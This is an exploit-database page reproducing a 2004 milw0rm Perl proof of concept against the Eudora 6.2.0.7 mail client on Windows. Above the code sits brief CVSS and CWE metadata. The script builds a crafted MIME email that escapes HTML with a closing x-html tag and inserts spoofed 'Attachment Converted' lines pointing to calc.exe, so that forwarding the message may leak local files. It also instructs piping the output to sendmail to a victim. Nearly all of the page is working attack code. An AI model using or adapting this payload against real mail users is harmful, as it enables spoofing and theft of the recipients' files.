header-logo
Suggest Exploit
vendor:
Eudora
by:
milw0rm.com
5.5
CVSS
MEDIUM
Spoofing
CWE
Product Name: Eudora
Affected Version From: Eudora 6.2.0.7
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2004

Eudora 6.2.0.7 on Windows spoof

With spoofed attachments, we could 'steal' files (after a warning?) if the message was forwarded (not replied to). Within text/html part, use &lt;/x-html&gt; to get back to plaintext, no need for NUL or linebreak or nothing: </x-html>. Attachment Converted=00: "c:winntsystem32calc.exe". Attachment Converted=: "c:winntsystem32calc.exe". Attachment Converted: "c:winntsystem32calc.exe"

Mitigation:

Source

Exploit-DB raw data:

#!/usr/bin/perl -- 


use MIME::Base64; 


print "From: me\n"; 
print "To: you\n"; 
print "Subject: Eudora 6.2.0.7 on Windows spoof\n"; 
print "MIME-Version: 1.0\n"; 
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n"; 
print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n"; 


print "--zzz\n"; 
print "Content-Type: text/plain\n"; 
print "Content-Transfer-Encoding: 7bit\n\n"; 
print "With spoofed attachments, we could 'steal' files (after a warning?) 
if the message was forwarded (not replied to).\n"; 


print "\n--zzz\n"; 
print "Content-Type: text/html; name=\"qp.txt\"\n"; 
print "Content-Transfer-Encoding: quoted-printable \n"; 
print "Content-Disposition: inline; filename=\"qp.txt\"\n\n"; 
print "Within text/html part, use &lt;/x-html&gt; to get back to plaintext, 
no need for NUL or linebreak or nothing: 
</x-html>\n"; 
print "Attachment Converted=00: \"c:\\winnt\\system32\\calc.exe\"\n"; 
print "Attachment Converted= 
: \"c:\\winnt\\system32\\calc.exe\"\n"; 
print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n"; 


print "\n--zzz--\n"; 


# milw0rm.com [2004-10-11]